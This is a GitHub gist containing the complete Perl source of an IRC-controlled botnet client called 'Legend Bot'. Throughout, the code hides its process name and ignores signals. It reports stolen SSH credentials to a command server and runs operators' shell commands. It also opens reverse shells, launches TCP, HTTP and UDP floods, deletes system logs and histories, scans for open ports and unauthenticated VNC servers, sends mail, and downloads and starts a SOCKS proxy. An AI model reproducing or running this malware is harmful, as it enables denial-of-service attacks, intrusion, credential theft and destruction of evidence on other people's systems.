Skip to content

Instantly share code, notes, and snippets.

@TheBB

TheBB/gist:241c5aaa5572114c94f7

Created October 2, 2014 13:48
Show Gist options
  • Save TheBB/241c5aaa5572114c94f7 to your computer and use it in GitHub Desktop.
Save TheBB/241c5aaa5572114c94f7 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
gistfile1.pl
#!/usr/bin/perl
###########################################################
#-PRIVATE-SHIT--PRIVATE-SHIT--PRIVATE-SHIT--PRIVATE-SHIT--#
###########################################################
# Legend Bot [2011] DO NOT FUCKIN SHARE! #
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
# Commands: #
# !legend @system #
# !legend @rootable #
# !legend @cleanlogs #
# !legend @socks5 #
# !legend @nmap <ip> <beginport> <endport> #
# !legend @back <ip><port> #
# !legend @sqlflood <host> <time> #
# !legend @udp <host> <packet size> <time> #
# !legend @udp2 <host> <packet size> <time> <port> #
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
###########################################################
###########################################################
####################[Configuration]########################
###########################################################
my $sshuser = $argv[0];
my $sshpass = $argv[1];
my $sshhost = $argv[2];
my $hidden = 'core';
my $linas_max='4';
my $sleep='5';
my @admins=("god","ARZ","Zax");
my @hostauth=("legend.rocks");
my @channels=("#apache");
my $nick= 'BASH';
my $ircname ='B';
my $realname = '$uname';
my $server='chaos.legend.rocks';
my $port='7777';
###########################################################
####################[Configuration]########################
###########################################################
####################[lets start..]#########################
###########################################################
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$0="$hidden"."\0"x16;;
my $pid=fork;
exit if $pid;
die "fork problem: $!" unless defined($pid);
###########################################################
####################[lets start..]#########################
###########################################################
####################[Connecting...]########################
###########################################################
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick = $_[0];
my $server_con = $_[1];
my $port_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server_con", PeerPort=>$port_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$server_con";
$irc_servers{$IRC_cur_socket}{'port'} = "$port_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $server_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$server", "$port"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
###########################################################
####################[Connecting...]########################
###########################################################
####################[..Connected..]########################
###########################################################
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION Legend IRC [2010]\001");
}
if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
if (grep {$_ =~ /^\Q$pn\E$/i } @admins) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E|\!legend)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
}
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick-".int rand(9999999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $channel (@channels) {
sendraw("JOIN $channel sexy");
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Hostname: $sshhost Username: $sshuser Password $sshpass2:.4");
}
}
}
###########################################################
####################[..Functions..]########################
###########################################################
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
###########################################################
######################[..@system..]########################
###########################################################
if ($funcarg =~ /^system/) {
$uname=`uname -a`;
$uptime=`uptime`;
$ownd=`pwd`;
$distro=`cat /etc/issue`;
$id=`id`;
$un=`uname -sro`;
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4");
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2Uname -a: 14 $uname");
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2Uptime: 14 $uptime");
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2Process: 14 $hidden");
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2ID: 14 $id");
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2Dir: 14 $ownd");
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2OS: 14 $distro");
}
###########################################################
######################[..@system..]########################
###########################################################
###########################################################
######################[.@portscan.]########################
###########################################################
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
@portas=("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","783","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","10000","19150","27374","31310","33133","33733","55555");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Port Scan2:.4 Scanning for open ports on ".$1." 12 started .");
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto =>
'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Port Scan2:.4 Open ports founded: @aberta");
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Port Scan2:.4 No open ports foundend.");
}
}
###########################################################
######################[.@portscan.]########################
###########################################################
###########################################################
######################[.@tcpflood.]########################
###########################################################
if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4TCP2:.4 TCP Attacking14 ".$1.":".$2." 2for4 ".$3." 2seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($3>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$1","$2","$3");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4TCP2:. 4TCP Attack done 14".$1.":".$2.".");
}
###########################################################
######################[.@tcpflood.]########################
###########################################################
###########################################################
#####################[.@httpflood.]########################
###########################################################
if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4HTTP2:. 4HTTP Attacking14 ".$1." 4for4 ".$2." 2seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4HTTP2:. 4HTTP Attacking done ".$1.".");
}
###########################################################
#####################[.@httpflood.]########################
###########################################################
###########################################################
######################[.@sqlflood.]########################
###########################################################
if ($funcarg =~ /^sqlflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4SQL2:.4 Attacking 4 ".$1." 14 on port 3306 for 4 ".$2." 2 seconds .");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>3306);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4SQL2:.4 Attacking done 14 ".$1.".");
}
###########################################################
######################[.@sqlflood.]########################
###########################################################
###########################################################
######################[.@udpflood.]########################
###########################################################
if ($funcarg =~ /^udp\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4UDP2:.4 UDP Attacking14 ".$1." 4with2 ".$2." 2KB(s) for4 ".$3." 2seconds.");
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4UDP2:.4 UDP Sent14 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 2Kb in4 ".$dtime." 2seconds to ".$1.".");
}
###########################################################
######################[.@udpflood.]########################
###########################################################
###########################################################
######################[.@udp2flood.]########################
###########################################################
if ($funcarg =~ /^udp2\s+(.*)\s+(\d+)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4UDP22:.4 UDP2 Attacking14 ".$1.":".$4." 2with4 ".$2." 2KB(s) for4 ".$3." 2seconds.");
my ($dtime, %pacotes) = udpflooder2("$1", "$2", "$3","$4");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4UDP22:.4 UDP2 Sent14 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 2Kb in4 ".$dtime." 2seconds to ".$1.".");
}
############################################################
###########################################################
######################[.@cleanlogs.]#######################
###########################################################
if ($funcarg =~ /^cleanlogs/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Clean Logs2:.14 This process can be long2,4 just wait2!");
system 'rm -rf /var/log/lastlog';
system 'rm -rf /var/log/wtmp';
system 'rm -rf /etc/wtmp';
system 'rm -rf /var/run/utmp';
system 'rm -rf /etc/utmp';
system 'rm -rf /var/log';
system 'rm -rf /var/logs';
system 'rm -rf /var/adm';
system 'rm -rf /var/apache/log';
system 'rm -rf /var/apache/logs';
system 'rm -rf /usr/local/apache/log';
system 'rm -rf /usr/local/apache/logs';
system 'rm -rf /root/.bash_history';
system 'rm -rf /root/.ksh_history';
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Clean Logs2:.14 All default log and bash_history files erased");
sleep 1;
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Clean Logs2:.14 Now Erasing the rest of the machine log files");
system 'find / -name *.bash_history -exec rm -rf {} \;';
system 'find / -name *.bash_logout -exec rm -rf {} \;';
system 'find / -name "log*" -exec rm -rf {} \;';
system 'find / -name *.log -exec rm -rf {} \;';
sleep 1;
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Clean Logs2:.14 Done! All logs erased");
}
###########################################################
######################[.@cleanlogs.]#######################
###########################################################
###########################################################
########################[..@back..]########################
###########################################################
if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
my $host = "$1";
my $porta = "$2";
my $proto = getprotobyname('tcp');
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($porta, $iaddr);
my $shell = "/bin/sh -i";
if ($^O eq "MSWin32") {
$shell = "cmd.exe";
}
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
connect(SOCKET, $paddr) or die "connect: $!";
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system("$shell");
close(STDIN);
close(STDOUT);
close(STDERR);
if ($estatisticas){
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Back Connect2:.14 Connecting to 2 $host:$porta");
}
}
###########################################################
########################[..@back..]########################
###########################################################
###########################################################
#######################[.@rootable.]#######################
###########################################################
if ($funcarg =~ /^rootable/) {
my $khost = `uname -r`;
my $currentid = `whoami`;
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4r00table2:.14 Currently you are ".$currentid." ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4r00table2:.14 The kernel of this box is ".$khost." ");
chomp($khost);
my %h;
$h{'w00t'} = {
vuln=>['2.4.18','2.4.10','2.4.21','2.4.19','2.4.17','2.4.16','2.4.20']
};
$h{'brk'} = {
vuln=>['2.4.22','2.4.21','2.4.10','2.4.20']
};
$h{'ave'} = {
vuln=>['2.4.19','2.4.20']
};
$h{'elflbl'} = {
vuln=>['2.4.29']
};
$h{'elfdump'} = {
vuln=>['2.4.27']
};
$h{'expand_stack'} = {
vuln=>['2.4.29']
};
$h{'h00lyshit'} = {
vuln=>['2.6.8','2.6.10','2.6.11','2.6.9','2.6.7','2.6.13','2.6.14','2.6.15','2.6.16','2.6.2']
};
$h{'kdump'} = {
vuln=>['2.6.13']
};
$h{'km2'} = {
vuln=>['2.4.18','2.4.22']
};
$h{'krad'} = {
vuln=>['2.6.11']
};
$h{'krad3'} = {
vuln=>['2.6.11','2.6.9']
};
$h{'local26'} = {
vuln=>['2.6.13']
};
$h{'loko'} = {
vuln=>['2.4.22','2.4.23','2.4.24']
};
$h{'mremap_pte'} = {
vuln=>['2.4.20','2.2.25','2.4.24']
};
$h{'newlocal'} = {
vuln=>['2.4.17','2.4.19','2.4.18']
};
$h{'ong_bak'} = {
vuln=>['2.4.','2.6.']
};
$h{'ptrace'} = {
vuln=>['2.2.','2.4.22']
};
$h{'ptrace_kmod'} = {
vuln=>['2.4.2']
};
$h{'ptrace24'} = {
vuln=>['2.4.9']
};
$h{'pwned'} = {
vuln=>['2.4.','2.6.']
};
$h{'py2'} = {
vuln=>['2.6.9','2.6.17','2.6.15','2.6.13']
};
$h{'raptor_prctl'} = {
vuln=>['2.6.13','2.6.17','2.6.16','2.6.13']
};
$h{'prctl3'} = {
vuln=>['2.6.13','2.6.17','2.6.9']
};
$h{'remap'} = {
vuln=>['2.4.']
};
$h{'rip'} = {
vuln=>['2.2.']
};
$h{'stackgrow2'} = {
vuln=>['2.4.29','2.6.10']
};
$h{'uselib24'} = {
vuln=>['2.4.29','2.6.10','2.4.22','2.4.25']
};
$h{'newsmp'} = {
vuln=>['2.6.']
};
$h{'smpracer'} = {
vuln=>['2.4.29']
};
$h{'loginx'} = {
vuln=>['2.4.22']
};
$h{'exp.sh'} = {
vuln=>['2.6.9','2.6.10','2.6.16','2.6.13']
};
$h{'prctl'} = {
vuln=>['2.6.']
};
$h{'kmdx'} = {
vuln=>['2.6.','2.4.']
};
$h{'raptor'} = {
vuln=>['2.6.13','2.6.14','2.6.15','2.6.16']
};
$h{'raptor2'} = {
vuln=>['2.6.13','2.6.14','2.6.15','2.6.16']
};
foreach my $key(keys %h){
foreach my $kernel ( @{ $h{$key}{'vuln'} } ){
if($khost=~/^$kernel/){
chop($kernel) if ($kernel=~/.$/);
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4r00table2:.14 Possible Local Root Exploits: ". $key ." ");
}
}
}
}
###########################################################
#######################[.@rootable.]#######################
###########################################################
###########################################################
#######################[.@sendmail.]#######################
###########################################################
if ($funcarg =~ /^sendmail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Mailer2:.14 Sending Mail to : 2 $3");
$subject = $1;
$sender = $2;
$recipient = $3;
@corpo = $4;
$mailtype = "content-type: text/html";
$sendmail = '/usr/sbin/sendmail';
open (SENDMAIL, "| $sendmail -t");
print SENDMAIL "$mailtype\n";
print SENDMAIL "Subject: $subject\n";
print SENDMAIL "From: $sender\n";
print SENDMAIL "To: $recipient\n\n";
print SENDMAIL "@corpo\n\n";
close (SENDMAIL);
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Mailer2:.14 Mail Sent To : 2 $recipient");
}
###########################################################
#######################[.@sendmail.]#######################
###########################################################
###########################################################
########################[.@socks5.]########################
###########################################################
if ($funcarg =~ /^socks5/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Socks52:.14 Installing Mocks please wait4");
system 'cd /tmp';
system 'wget http://switch.dl.sourceforge.net/sourceforge/mocks/mocks-0.0.2.tar.gz';
system 'tar -xvfz mocks-0.0.2.tar.gz';
system 'rm -rf mocks-0.0.2.tar.gz';
system 'cd mocks-0.0.2';
system 'rm -rf mocks.conf';
system 'curl -O http://andromeda.covers.de/221/mocks.conf';
system 'touch mocks.log';
system 'chmod 0 mocks.log';
sleep(2);
system './mocks start';
sleep(4);
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Socks52:.14 Looks like its succesfully installed lets do the last things4 ");
#lets grab ip
$net = `/sbin/ifconfig | grep 'eth0'`;
if (length($net))
{
$net = `/sbin/ifconfig eth0 | grep 'inet addr'`;
if (!length($net))
{
$net = `/sbin/ifconfig eth0 | grep 'inet end.'`;
}
if (length($net))
{
chop($net);
@netip = split/:/,$net;
$netip[1] =~ /(\d{1,3}).(\d{1,3}).(\d{1,3}).(\d{1,3})/;
$ip = $1 .".". $2 .".". $3 .".". $4;
#and print it ^^
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Socks52:.14 Connect here :4 ". $ip .":8787 ");
}
else
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Socks52:.14 IP not founded ");
}
}
else
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3SocksV512] ERROR WHILE INSTALLING MOCKS ");
}
}
###########################################################
########################[.@socks5.]########################
###########################################################
###########################################################
##########################[.@vnc.]#########################
###########################################################
#r0xb0t 4.6 VNC ScaNNer by ARZ
if ($funcarg =~ /^vnc\s+(.*)/) {
my $MAX_SOCKET_TIME = 2;
my $MAX_CONNECT_TIME = 3;
#&ftpcheckm($printl);
my @hosts;
my $MAX_PROCESSES=100;
my $host=$1;
#my $victim=$host;
sendraw($IRC_cur_socket, "PRIVMSG $printl :_12[_4@_VNC_12] :::: IP Range:_4 $host* ");
$|=1;
foreach (0..255) {
my $pre="$host.$_.";
foreach (1..255) {
push(@hosts,$pre.$_);
}
}
my @pids;
my $npids=0;
for $victim (@hosts){
my $pid;
$pid=fork();
if($pid>0){
$npids++;
if($npids>=$MAX_PROCESSES){
for(1..($MAX_PROCESSES)){
$wait_ret=wait();
if($wait_ret>0){
$npids--;
}
}
}
next;
} elsif(undef $pid) {
# print "fork error\n" if ($DEBUG);
exit(0);
}else{
my($proto,$port);
$0="";
# kill thread on timeout
local $SIG{'ALRM'} = sub { exit(0); };
alarm $MAX_SOCKET_TIME;
my $port=5900;
print "Connecting to $victim:$port...";
#$| = 1;
($sock = IO::Socket::INET->new(PeerAddr => $victim,PeerPort => $port,Proto => 'tcp',)) ? print "\n": die("\n");
#negotiate protocol
$sock->read($protocol_version,12);
print $sock $protocol_version;
print "Using protocol $protocol_version";
$sock->read($security_types,1);
$sock->read($hahaha,unpack('C',$security_types));
print $sock "\x01";
$sock->read($in,4);
if(unpack('I',$in)) { die("\n") };
print $sock "\x01";
$sock->read($in,4);
(unpack('I',$in)) ?
sendraw($IRC_cur_socket, "PRIVMSG $printl :_12[_4@_VNC_12] ::::_4 ".$victim." _12is Vulnerable using protocol_4 ".$protocol_version): die("\n");
exit;
}
}
for(1..$npids){
my $wt=wait();
if($wt==-1){
# print "hey $!\n" if($DEBUG);
redo;
}
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :_12[_4@_VNC_12] :::: Finished Scan for _4 $host ");
}
###########################################################
##########################[.@vnc.]#########################
###########################################################
###########################################################
#########################[.@nmap.]#########################
###########################################################
if ($funcarg =~ /^nmap\s+(.*)\s+(\d+)\s+(\d+)/){
my $hostip="$1";
my $portstart = "$2";
my $portend = "$3";
my (@abertas, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Nmap2:.14 Scanning $1 For Ports: $2-$3");
foreach my $porta ($portstart..$portend){
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime);
if ($scansock) {
push (@abertas, $porta);
$scansock->close;
if ($xstats){
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Nmap2:.14 Founded $porta"."/Open");
}
}
}
if (@abertas) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Nmap2:.14 Complete");
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Nmap2:.14 No open ports have been founded");
}
}
###########################################################
#########################[.@nmap.]#########################
###########################################################
exit;
}
}
}
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}
sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $port = 1; $port <= 65000; $port++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
sub udpflooder2 {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my $udpport = $_[3];
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{o}++;
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
sendraw("PART $_[0]");
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment